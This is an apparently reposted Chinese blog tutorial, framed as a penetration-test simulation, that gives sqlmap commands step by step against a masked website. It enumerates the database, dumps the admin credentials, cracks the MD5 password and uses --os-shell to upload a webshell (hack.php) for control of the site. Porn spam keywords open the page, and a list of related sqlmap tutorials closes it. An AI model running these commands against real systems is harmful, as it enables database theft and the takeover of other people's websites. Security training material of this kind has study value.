国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

滲透測試模擬(使用sqlmap進行sql注入漏洞判斷,利用該漏洞進行掛馬)

這篇具有很好參考價值的文章主要介紹了滲透測試模擬(使用sqlmap進行sql注入漏洞判斷,利用該漏洞進行掛馬)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

環(huán)境:對某網(wǎng)站進行滲透測試。

(PHP+Mysql開發(fā)的網(wǎng)站,用于WEB漏洞教學和檢測的)

工具:sqlmap(Kali Linux中自帶or官網(wǎng)下載Windows版)

此次實驗所涉及的sqlmap參數(shù):

sqlmap判斷是否有注入,網(wǎng)絡空間安全,sql,安全,web安全,Powered by 金山文檔

一、信息收集

sqlmap判斷是否有注入,網(wǎng)絡空間安全,sql,安全,web安全,Powered by 金山文檔

二、漏洞挖掘

(1)判斷網(wǎng)站是否存在sql注入漏洞

使用工具,sqlmap:sqlmap -u "目標網(wǎng)站地址" --batch

sqlmap判斷是否有注入,網(wǎng)絡空間安全,sql,安全,web安全,Powered by 金山文檔
(2)存在 sql注入漏洞,

使用sqlmap進行sql注入,并獲取后臺管理員的賬號和密碼。

1、先跑出當前網(wǎng)站所使用的數(shù)據(jù)庫庫名

(sqlmap -u "http://*********/product.php?cid=4" --current-db)

sqlmap判斷是否有注入,網(wǎng)絡空間安全,sql,安全,web安全,Powered by 金山文檔

當前數(shù)據(jù)庫:’510cms‘。

2、求當前數(shù)據(jù)庫下所有表名

(sqlmap -u "http://*************/product.php?cid=4" -D 510cms --tables)

sqlmap判斷是否有注入,網(wǎng)絡空間安全,sql,安全,web安全,Powered by 金山文檔

3、求指定表內(nèi)列名

(sqlmap -u "http://***********/product.php?cid=4" -D 510cms -T 510_admin --columns)

sqlmap判斷是否有注入,網(wǎng)絡空間安全,sql,安全,web安全,Powered by 金山文檔

4、求指定列名的字段

(sqlmap -u "http://*********/product.php?cid=4" -D 510cms -T 510_admin -C name,passwd --dump)

sqlmap判斷是否有注入,網(wǎng)絡空間安全,sql,安全,web安全,Powered by 金山文檔

三、獲取賬戶密碼后就可以登錄網(wǎng)站后臺()

(1)使用md5在線解密破解密碼

獲取弱口令

sqlmap判斷是否有注入,網(wǎng)絡空間安全,sql,安全,web安全,Powered by 金山文檔
(2)找到后臺地址就可以登錄了
sqlmap判斷是否有注入,網(wǎng)絡空間安全,sql,安全,web安全,Powered by 金山文檔
(3)如何獲取網(wǎng)站后臺地址(參考之前的一篇)

(223條消息) 滲透測試中的信息收集(使用相關工具,收集網(wǎng)站的子域名,掃描網(wǎng)站的后臺地址)_net1996的博客-CSDN博客

四、攻擊網(wǎng)站,利用sqlmap上傳大馬,可以對網(wǎng)站進行后臺操作

(1)

(sqlmap -u "http://************/product.php?cid=4" --os-shell)

四個選項:

sqlmap判斷是否有注入,網(wǎng)絡空間安全,sql,安全,web安全,Powered by 金山文檔
sqlmap判斷是否有注入,網(wǎng)絡空間安全,sql,安全,web安全,Powered by 金山文檔
(2)進入如上網(wǎng)站,上傳自己準備的大馬(hack.php)
sqlmap判斷是否有注入,網(wǎng)絡空間安全,sql,安全,web安全,Powered by 金山文檔
(3)上傳成功后,在網(wǎng)站原址后加上/hack.php即可進入操作界面

(http://***********/hack.php)密碼在大馬文件中有。文章來源地址http://www.zghlxwxcb.cn/news/detail-613166.html

sqlmap判斷是否有注入,網(wǎng)絡空間安全,sql,安全,web安全,Powered by 金山文檔

到了這里,關于滲透測試模擬(使用sqlmap進行sql注入漏洞判斷,利用該漏洞進行掛馬)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • ?sql注入之sqlmap使用

    ?sql注入之sqlmap使用

    (1)get注入 python sqlmap.py -u \\\" 指定注入點的URL \\\" #其中“ -u ”參數(shù)用于 指定注入點的URL 。 python sqlmap.py -u \\\" 指定注入點的URL \\\" --dbs #,其中參數(shù)“ --dbs ”用于列舉數(shù)據(jù)庫。 python sqlmap.py -u \\\" 指定注入點的URL \\\" -D iwebsec --tables #其中參數(shù)“ -D ”用于指定數(shù)據(jù)庫名稱,“ --tables ”參數(shù)

    2024年02月15日
    瀏覽(14)
  • SQL注入(DVWA靶場搭建及使用、sqlMap注入、sqlmap問題及解決辦法)

    SQL注入(DVWA靶場搭建及使用、sqlMap注入、sqlmap問題及解決辦法)

    1、客戶端向服務端請求的流程 2、SQL注入常見分類 ?3、SQL注入常見過程 ?4、SQL注入的作用 ?5、常用SQL測試語句 ?注釋字符: 一、下載DVWA 下載地址:DVWA/README.zh.md at master · digininja/DVWA · GitHub 這里我是從GitHub上下載的,小伙伴們自行選擇 二、安裝DVWA 在安裝前,需要做一個

    2024年01月23日
    瀏覽(21)
  • 滲透測試-SQL注入之寬字節(jié)注入

    滲透測試-SQL注入之寬字節(jié)注入

    寬字節(jié)是相對于ascII這樣單字節(jié)而言的;像 GB2312、GBK、GB18030、BIG5、Shift_JIS 等這些都是常說的寬字節(jié),實際上只有兩字節(jié)。GBK 是一種多字符的編碼,通常來說,一個 gbk 編碼漢字,占用2個字節(jié)。一個 utf-8 編碼的漢字,占用3個字節(jié)。 轉(zhuǎn)義函數(shù):為了過濾用戶輸入的一些數(shù)據(jù),

    2023年04月08日
    瀏覽(22)
  • 安全中級11:sql注入+聯(lián)合、報錯、時間盲注+sqlmap使用

    安全中級11:sql注入+聯(lián)合、報錯、時間盲注+sqlmap使用

    目錄 一、sql注入原理? 二、聯(lián)合SQL注入的方法 1.總體的思路 (1)先進行閉合,進行報錯 (2)進行逃逸 (3)外帶數(shù)據(jù) (4)獲取庫名 表名 列名 數(shù)據(jù) (5)獲取當前數(shù)據(jù)庫中的數(shù)據(jù) 2.SQL注入測試 (1)先進行單雙引號閉合,讓頁面出現(xiàn)頁面報錯 (2)然后看有幾列,有兩種方

    2024年02月13日
    瀏覽(22)
  • 【SQL注入】Sqlmap使用指南(手把手保姆版)持續(xù)更新

    【SQL注入】Sqlmap使用指南(手把手保姆版)持續(xù)更新

    官網(wǎng)下載地址:https://github.com/sqlmapproject/sqlmap sqlmap 是一款開源的滲透測試工具,可以自動化進行SQL注入的檢測、利用,并能接管數(shù)據(jù)庫服務器。它具有功能強大的檢測引擎,為滲透測試人員提供了許多專業(yè)的功能并且可以進行組合,其中包括數(shù)據(jù)庫指紋識別、數(shù)據(jù)讀取和訪問

    2024年04月10日
    瀏覽(32)
  • 【網(wǎng)絡安全-sql注入(5)】sqlmap以及幾款自動化sql注入工具的詳細使用過程(提供工具)

    【網(wǎng)絡安全-sql注入(5)】sqlmap以及幾款自動化sql注入工具的詳細使用過程(提供工具)

    分享一個非常詳細的網(wǎng)絡安全筆記,是我學習網(wǎng)安過程中用心寫的,可以點開以下鏈接獲?。?超詳細的網(wǎng)絡安全筆記 (也可以拿自己的環(huán)鏡來玩,我是用pikachu靶場來演示的) 【網(wǎng)路安全 --- pikachu靶場安裝】超詳細的pikachu靶場安裝教程(提供靶場代碼及工具)_網(wǎng)絡安全_Ai

    2024年02月08日
    瀏覽(19)
  • 滲透測試-SQL注入之核心語法獲取數(shù)據(jù)庫信息

    滲透測試-SQL注入之核心語法獲取數(shù)據(jù)庫信息

    SQL實驗室第一關 下載sqli-labs到phpstudy的www目錄下 打開localhost/sqli-labs運行即可 (1)注入語句 ‘~’ 相當于16進制的0x7e 萬能密碼 \\\'or ‘1’ =\\\'1 ’ and ‘1’=‘1 ’ and 1=2 union select 1,user(),3- -+ 前面加’是為了閉合后面的’ (2)group_concat(string) (1)SQL手工注入方法 select schema_name

    2024年02月10日
    瀏覽(19)
  • Web安全:SQL注入漏洞測試.

    Web安全:SQL注入漏洞測試.

    SQL注入就是 有些 惡意用戶在提交查詢請求的過程中 將SQL語句插入到請求內(nèi)容 中,同時程序的本身對用戶輸入的內(nèi)容過于相信, 沒有對用戶插入的SQL語句進行任何的過濾 ,從而 直接被SQL語句直接被服務端執(zhí)行 ,導致數(shù)據(jù)庫的原有信息泄露,篡改,甚至被刪除等風險。 SQL注

    2024年02月05日
    瀏覽(24)
  • Web安全:SQL注入漏洞測試(防止 黑客利用此漏洞.)

    Web安全:SQL注入漏洞測試(防止 黑客利用此漏洞.)

    SQL注入就是 有些 惡意用戶在提交查詢請求的過程中 將SQL語句插入到請求內(nèi)容 中,同時程序的本身對用戶輸入的內(nèi)容過于相信, 沒有對用戶插入的SQL語句進行任何的過濾 ,從而 直接被SQL語句直接被服務端執(zhí)行 ,導致數(shù)據(jù)庫的原有信息泄露,篡改,甚至被刪除等風險。 SQL注

    2024年02月13日
    瀏覽(22)
  • Web安全 SQL注入漏洞測試.(可以 防止惡意用戶利用漏洞)

    Web安全 SQL注入漏洞測試.(可以 防止惡意用戶利用漏洞)

    SQL注入就是 有些 惡意用戶在提交查詢請求的過程中 將SQL語句插入到請求內(nèi)容 中,同時程序的本身對用戶輸入的內(nèi)容過于相信, 沒有對用戶插入的SQL語句進行任何的過濾 ,從而 直接被SQL語句直接被服務端執(zhí)行 ,導致數(shù)據(jù)庫的原有信息泄露,篡改,甚至被刪除等風險。 SQL注

    2023年04月20日
    瀏覽(25)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包